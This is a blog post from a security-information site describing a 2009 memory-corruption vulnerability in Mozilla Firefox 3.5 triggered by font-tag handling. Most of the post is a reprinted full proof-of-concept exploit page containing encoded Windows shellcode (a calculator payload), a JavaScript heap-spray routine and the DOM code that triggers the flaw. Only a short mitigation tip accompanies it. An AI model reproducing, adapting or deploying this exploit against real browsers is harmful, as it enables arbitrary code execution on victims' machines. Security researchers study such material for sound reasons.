Security Information and Review

Collection of security information and review

Vulnerability Web Browser Firefox 3.5 with Highly Critical Security

Author : Admin

Mozilla Firefox 3.5 was released June 30th, 2009 that is claimed as the best modern web browser and more faster to render web pages. However, in July 13, 2009, SBerry has discovered a vulnerability in web browser Mozilla Firefox, which can be exploited by malicious people to compromise a user’s system. This is the first vulnerability of Mozilla Firefox v3.5 that was published.

Mozilla Firefox with new features like private browsing, tear-off tabs and enhancements to the Awesome Bar, plus major performance enhancements. In the security improvement, secure surfing is top priority, anti phishing, anti malware technology and have added private browsing and “forget this site” options to ensure our privacy.

The first vulnerability of Mozilla Firefox 3.5 is due an error when processing JavaScript code handling, such “Font tags” in HTML code. This vulnerability can be exploited attacker with malicious code that it’s cause a memory corruption. For example, SBerry aka Simon Berry-Byrne was release exploit code that can see at the following source code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
 
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
</head
 
<body>
 
<h1>Firefox 3.5 Heap Spray Vulnerabilty</h1><br />
Author: SBerry aka Simon Berry-Byrne<br />
Thanks to HD Moore for the insight and Metasploit for the payload
 
<div id="content">
 
<p>
    <FONT>Loremipsumdoloregkuw</FONT></p>
<p>
    <FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
    <FONT>Loremikdkw  </FONT>
</p>
</div>
 
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>

Successful exploitation allows execution of arbitrary code. So, how to patch this vulnerability ..? This vulnerability is marked as unpatched with the most severe being rated Highly critical, so solution for this case, don’t browse untrusted websites or follow untrusted links with Mozilla Firefox.

Mohamad Widodo

Mohamad Widodo

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Web Application Security
If you like this posts, please leave messages / comments.